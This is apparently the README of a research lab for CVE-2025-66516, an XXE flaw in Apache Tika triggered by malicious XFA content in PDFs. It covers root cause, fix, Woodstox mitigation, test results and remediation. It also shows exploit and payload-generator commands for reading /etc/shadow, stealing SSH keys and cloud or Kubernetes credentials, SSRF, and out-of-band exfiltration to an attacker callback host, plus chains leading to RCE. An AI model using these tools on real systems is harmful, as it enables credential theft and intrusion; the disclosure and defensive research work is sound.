CVE-2025-66516 is a critical XML External Entity (XXE) injection vulnerability in Apache Tika with a CVSS score of 10.0 (maximum severity). The vulnerability allows remote attackers to read arbitrary files, perform Server-Side Request Forgery (SSRF), and exfiltrate sensitive data by uploading a specially crafted PDF document containing malicious XFA (XML Forms Architecture) content.
| Attribute | Value |
|---|---|
| CVE ID | CVE-2025-66516 |
| CVSS Score | 10.0 (Critical) |
| Disclosed | December 4, 2025 |
| Vendor | Apache Software Foundation |
| Affected Product | Apache Tika |
| Attack Vector | Network (Remote) |
| Authentication | None Required |

| Component | Vulnerable Versions | Fixed Version |
|---|---|---|
| tika-core | 1.13 - 3.2.1 | 3.2.2+ |
| tika-parser-pdf-module | 2.0.0 - 3.2.1 | 3.2.2+ |
| tika-parsers | 1.13 - 1.28.5 | Upgrade to 3.2.2+ (from 2.0.0 onward the PDF parser lives in tika-parser-pdf-module) |
Important: This CVE supersedes CVE-2025-54988, which incorrectly identified only the PDF module as vulnerable. The actual vulnerability resides in tika-core.
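
The version ranges in the table can be checked mechanically. The following is a minimal sketch, not an official tool: the `AFFECTED` mapping is copied from the table above, and the helper names `parse_version` and `is_affected` are illustrative.

```python
import re

# Affected ranges copied from the table above: (first affected, last affected).
AFFECTED = {
    "tika-core": ((1, 13), (3, 2, 1)),
    "tika-parser-pdf-module": ((2, 0, 0), (3, 2, 1)),
    "tika-parsers": ((1, 13), (1, 28, 5)),
}


def parse_version(text):
    """Turn '2.9.2' into (2, 9, 2); a suffix such as '-SNAPSHOT' is ignored."""
    match = re.match(r"\d+(?:\.\d+)*", text.strip())
    if not match:
        raise ValueError(f"unrecognised version: {text!r}")
    return tuple(int(part) for part in match.group().split("."))


def is_affected(component, version):
    """Return True if the version falls inside the affected range for the component."""
    low, high = AFFECTED[component]
    return low <= parse_version(version) <= high
```

Because the flaw sits in tika-core, a project should be treated as affected if any one of its Tika components is in range, even when the PDF module alone has been upgraded.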
The vulnerability is an XML External Entity (XXE) injection flaw in how Apache Tika processes XFA (XML Forms Architecture) data within PDF documents.
The Problem: Tika relies on an underlying Java StAX parser to read XFA XML content. Vulnerable versions failed to configure that parser so that external entity resolution is disabled. When the parser encounters an external entity declaration (such as SYSTEM "file:///etc/passwd"), it resolves the reference and substitutes the file contents into the parsed document, where they end up in Tika's extracted output.
Location: The bug exists in XMLReaderUtils.getXMLInputFactory() in tika-core:
public static XMLInputFactory getXMLInputFactory() {
    XMLInputFactory factory = XMLInputFactory.newFactory();
    tryToSetStaxProperty(factory, XMLInputFactory.IS_NAMESPACE_AWARE, true);
    tryToSetStaxProperty(factory, XMLInputFactory.IS_VALIDATING, false);
    factory.setXMLResolver(IGNORING_STAX_ENTITY_RESOLVER); // <-- Ineffective
    return factory;
}

The IGNORING_STAX_ENTITY_RESOLVER was intended to block XXE by returning an empty result, but it returned a String instead of the expected InputStream. The JDK's default StAX parser silently ignored this incorrect return type and fell back to default behavior, which resolves external entities.
The fix explicitly disables DTD and external entity support at the factory level:
tryToSetStaxProperty(factory, XMLInputFactory.SUPPORT_DTD, false);
tryToSetStaxProperty(factory, XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);

Additionally, the resolver was changed to return a proper InputStream type.
In the Java ecosystem, multiple XML parser libraries exist. Applications use whichever parser is configured or found first on the classpath.
What is Woodstox? Woodstox is a high-performance, open-source StAX XML parser commonly bundled with Java applications.
How it provides protection: By design (not by accident), Woodstox's implementation correctly handles the XMLResolver return type. When Woodstox receives the string return value from IGNORING_STAX_ENTITY_RESOLVER, it treats it as valid empty content, effectively blocking the XXE.
Critical distinction:
- tika-server-standard.jar bundles Woodstox - NOT VULNERABLE
- tika-core + parser modules (embedded usage) does NOT bundle Woodstox - VULNERABLE
- Applications using JDK's default StAX parser - VULNERABLE
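
Since exposure depends on whether Woodstox is present, it helps to check a deployment's jars directly. The sketch below is a heuristic under stated assumptions: it looks for Woodstox's factory class (`com.ctc.wstx.stax.WstxInputFactory`) inside a jar and for the standalone `woodstox-core` artifact name. The helper names are illustrative. A relocated (shaded and renamed) copy of Woodstox would be missed, and finding the jar does not prove it is the StAX implementation actually selected at runtime.

```python
import re
import zipfile

# Woodstox's StAX factory class; finding it inside a jar suggests Woodstox is bundled.
WOODSTOX_FACTORY_CLASS = "com/ctc/wstx/stax/WstxInputFactory.class"
# Standalone artifact names: woodstox-core-<version>.jar (older: woodstox-core-asl-<version>.jar).
WOODSTOX_JAR_NAME = re.compile(r"^woodstox-core(-asl)?-\d[\w.\-]*\.jar$")


def jar_bundles_woodstox(jar):
    """True if the jar (a path or a binary file object) contains the Woodstox factory class."""
    with zipfile.ZipFile(jar) as archive:
        return WOODSTOX_FACTORY_CLASS in archive.namelist()


def woodstox_jars(jar_names):
    """Return the file names that look like a standalone Woodstox release."""
    return [name for name in jar_names if WOODSTOX_JAR_NAME.match(name)]
```

For an embedded deployment, `woodstox_jars` can be fed the file names from the application's library directory. For a fat jar such as tika-server-standard.jar, `jar_bundles_woodstox` inspects the archive contents instead.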
# 1. Start the lab environment
docker-compose up -d --build
# 2. Test against vulnerable Tika (JDK StAX, port 9997)
python poc/exploit.py --url http://localhost:9997 --check
# 3. Extract /etc/passwd
python poc/exploit.py --url http://localhost:9997 --file /etc/passwd
# 4. Compare with protected Tika (Woodstox, port 9998)
python poc/exploit.py --url http://localhost:9998 --check

CVE-2025-66516/
|-- docker-compose.yml # Lab orchestration
|-- vulnerable-tika/
| |-- Dockerfile # Tika with Woodstox (protected)
| +-- Dockerfile.jdk-stax # Tika without Woodstox (VULNERABLE)
|-- webapp/
| |-- Dockerfile
| |-- app.py # Flask upload application
| +-- templates/
|-- poc/
| |-- exploit.py # Automated exploitation tool
| +-- generate_payload.py # Malicious PDF generator
+-- README.md
| Service | Port | Description |
|---|---|---|
| Web Application | 8080 | Document upload frontend |
| Tika (Woodstox) | 9998 | Protected - NOT vulnerable |
| Tika (JDK StAX) | 9997 | VULNERABLE - No Woodstox |
| Attacker Listener | 9999 | HTTP server for OOB testing |
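
Before running any test it is worth confirming which Tika version each lab service reports. The sketch below assumes the Tika server exposes its version at `/version` with a banner of the form `Apache Tika 2.9.2`. The function names are illustrative, and only the banner parsing is exercised offline.

```python
import re
import urllib.request


def parse_tika_banner(banner):
    """Extract '2.9.2' from a banner such as 'Apache Tika 2.9.2'; None if absent."""
    match = re.search(r"Apache Tika (\d+(?:\.\d+)+)", banner)
    return match.group(1) if match else None


def fetch_tika_version(base_url, timeout=5):
    """GET <base_url>/version and return the reported version string, or None."""
    url = f"{base_url.rstrip('/')}/version"
    with urllib.request.urlopen(url, timeout=timeout) as response:
        return parse_tika_banner(response.read().decode("utf-8", "replace"))
```

Against the lab, `fetch_tika_version("http://localhost:9997")` and `fetch_tika_version("http://localhost:9998")` should report the same version. The difference between the two services is the StAX implementation, not the Tika release.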
docker-compose up -d --build

Full-chain exploitation with automatic payload generation and data extraction.
# Check if target is vulnerable
python poc/exploit.py --url http://target:9998 --check
# Read local files
python poc/exploit.py --url http://target:9998 --file /etc/passwd
python poc/exploit.py --url http://target:9998 --file /etc/shadow
# AWS metadata theft (EC2 instances)
python poc/exploit.py --url http://target:9998 --aws-metadata
# Kubernetes secrets
python poc/exploit.py --url http://target:9998 --k8s-secrets
# SSRF to internal services
python poc/exploit.py --url http://target:9998 --ssrf http://internal:8080/admin
# Save extracted data
python poc/exploit.py --url http://target:9998 --file /etc/passwd --save loot.txt

Generates malicious PDF files for manual testing or integration with other tools.
# Generate payload for specific file
python poc/generate_payload.py --target /etc/passwd --output exploit.pdf
# Generate SSRF payload
python poc/generate_payload.py --target http://169.254.169.254/latest/meta-data/ --output ssrf.pdf
# Generate OOB exfiltration payload
python poc/generate_payload.py --target /etc/passwd --callback http://attacker:8080 --output oob.pdf
# Use attack mode presets
python poc/generate_payload.py --mode aws_metadata --output aws.pdf
python poc/generate_payload.py --mode k8s_secrets --all-targets --output ./payloads/
# List available attack modes
python poc/generate_payload.py --list-modes

Available Attack Modes:
- file_read - Read local files (/etc/passwd, /etc/shadow, etc.)
- ssh_keys - Steal SSH private keys
- aws_metadata - AWS EC2 metadata and IAM credentials
- gcp_metadata - GCP service account tokens
- azure_metadata - Azure managed identity tokens
- k8s_secrets - Kubernetes service account credentials
- webapp_configs - Common web application configs
- ssrf_internal - Probe internal services
Testing against Tika 2.9.2 without Woodstox (simulating embedded deployments):
| Test | Result |
|---|---|
| XFA Detection | [PASS] PDF recognized as having XFA |
| XFA Parsing | [PASS] XFA content extracted |
| XXE File Read | [VULNERABLE] /etc/passwd contents exfiltrated |
| XXE SSRF | [VULNERABLE] External requests sent |
Proof of Exploitation:
<li fieldName="data">data: root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
Testing against Tika 2.9.2 with Woodstox (standard tika-server-standard.jar):
| Test | Result |
|---|---|
| XFA Detection | [PASS] PDF recognized as having XFA |
| XFA Parsing | [PASS] XFA content extracted |
| XXE File Read | [BLOCKED] External entities not resolved |
| XXE SSRF | [BLOCKED] No outbound connections |
Output shows empty entity:
<li fieldName="data">data: </li>
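
The two outputs above differ only in whether the `data` field carries content, so the verdict can be automated. This is a minimal sketch that assumes the field is named `data`, as in the lab samples shown here. The regular expression and function names are illustrative and not part of Tika.

```python
import re

# Matches the <li fieldName="data"> element from the sample outputs; the closing
# tag is optional because the vulnerable sample above is truncated.
DATA_FIELD = re.compile(r'<li fieldName="data">data:(.*?)(?:</li>|\Z)', re.DOTALL)


def extracted_entity_text(tika_output):
    """Return the text emitted for the 'data' field, or None if the field is absent."""
    match = DATA_FIELD.search(tika_output)
    return match.group(1).strip() if match else None


def entity_was_resolved(tika_output):
    """True when the 'data' field holds content, meaning the entity was expanded."""
    return bool(extracted_entity_text(tika_output))
```

An empty field is consistent with a blocked entity, while a missing field (`None`) more likely means the XFA content was never parsed and the test itself needs checking.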
The vulnerability is real and critical. Exploitation depends on the StAX implementation:
- [PROTECTED] tika-server-standard.jar - Bundled Woodstox blocks XXE
- [VULNERABLE] Embedded Tika (tika-core + parsers) - Uses JDK StAX by default
- [VULNERABLE] Custom deployments without Woodstox
- [VULNERABLE] Enterprise integrations (Elasticsearch, Solr, Alfresco) - Often use embedded Tika
XXE is fundamentally a file read/SSRF vulnerability, not direct RCE. However, it enables several attack paths:
| Attack | Payload Example |
|---|---|
| File Read | SYSTEM "file:///etc/passwd" |
| SSRF | SYSTEM "http://internal:8080/admin" |
| AWS Metadata | SYSTEM "http://169.254.169.254/latest/meta-data/" |

| Scenario | Attack Path |
|---|---|
| AWS EC2 | XXE -> SSRF to metadata -> IAM credentials -> AWS CLI RCE |
| Kubernetes | XXE -> Read service account token -> kubectl exec |
| Internal Jenkins | XXE -> SSRF to script console -> Groovy RCE |
| Database | XXE -> Read config files -> Database access |
| SSH | XXE -> Read SSH keys -> Remote shell access |
- Upgrade Apache Tika to version 3.2.2 or later

      <dependency>
        <groupId>org.apache.tika</groupId>
        <artifactId>tika-core</artifactId>
        <version>3.2.2</version>
      </dependency>

- Verify all Tika components are updated (tika-core AND parser modules)
| Deployment Type | Risk Level |
|---|---|
| tika-server-standard.jar | LOW - Woodstox mitigates |
| Embedded Tika (library usage) | HIGH - Likely vulnerable |
| Custom without Woodstox | HIGH - Vulnerable |
- Input Validation - Validate uploaded file types
- Network Segmentation - Isolate Tika processing
- Least Privilege - Minimal filesystem permissions
- Monitoring - Alert on unusual file access
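
As an illustration of the input-validation item, an upload handler could flag PDFs that declare XFA content before they reach Tika. This is a rough heuristic, not a complete defense: it scans raw bytes only, so markers inside compressed streams or object streams are invisible to it, and the names `inspect_pdf_upload` and `should_quarantine` are hypothetical. It complements upgrading and does not replace it.

```python
# Byte markers that suggest XFA form data or an inline DTD in the raw file.
XFA_MARKERS = (b"/XFA", b"<xdp:xdp")
DTD_MARKERS = (b"<!DOCTYPE", b"<!ENTITY")


def inspect_pdf_upload(data):
    """Return heuristic flags computed from an uploaded file's raw bytes."""
    return {
        "is_pdf": data.lstrip()[:5] == b"%PDF-",
        "has_xfa": any(marker in data for marker in XFA_MARKERS),
        "has_dtd": any(marker in data for marker in DTD_MARKERS),
    }


def should_quarantine(data):
    """Hold back PDFs that declare XFA; the DTD flag is kept for logging only,
    because DTD markers are often hidden inside compressed streams."""
    flags = inspect_pdf_upload(data)
    return flags["is_pdf"] and flags["has_xfa"]
```

Quarantining on the XFA marker alone is deliberately conservative: legitimate XFA forms are held back too, which may be acceptable until the parser is patched.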
Issue 1: Initial exploit did not work
- XFA was detected but XXE never triggered
- Spent time debugging payload structure
Issue 2: Multiple XML declarations error
- Error: WstxParsingException: Illegal processing instruction target ("xml")
- Cause: XFA streams were each including XML declarations
- Fix: Only include declaration in preamble, not sub-streams
Issue 3: The Woodstox mystery
- All payloads failed against tika-server-standard.jar
- Discovered Woodstox was bundled and blocking XXE
- Created Dockerfile.jdk-stax to test without Woodstox
Issue 4: Testing wrong configuration
- Wasted time on protected configuration
- Lesson: Understand the full dependency tree before testing
- CVSS scores need context - Environmental factors affect exploitability
- Test minimal configurations - Don't assume bundled dependencies
- XML parsers vary wildly - Same code behaves differently with different parsers
- Embedded != Server - Library usage often has different dependencies
- Error messages are clues - Parser exceptions reveal implementation details
| Date | Event |
|---|---|
| August 2025 | CVE-2025-54988 disclosed (incomplete scope); Apache Tika 3.2.2 released with the fix |
| December 4, 2025 | CVE-2025-66516 published (full scope identified) |
This lab environment and proof-of-concept code are provided for authorized security testing, educational purposes, and defensive research only.
Do not use these tools against systems without explicit written authorization.
This research material is provided for educational purposes. Use responsibly.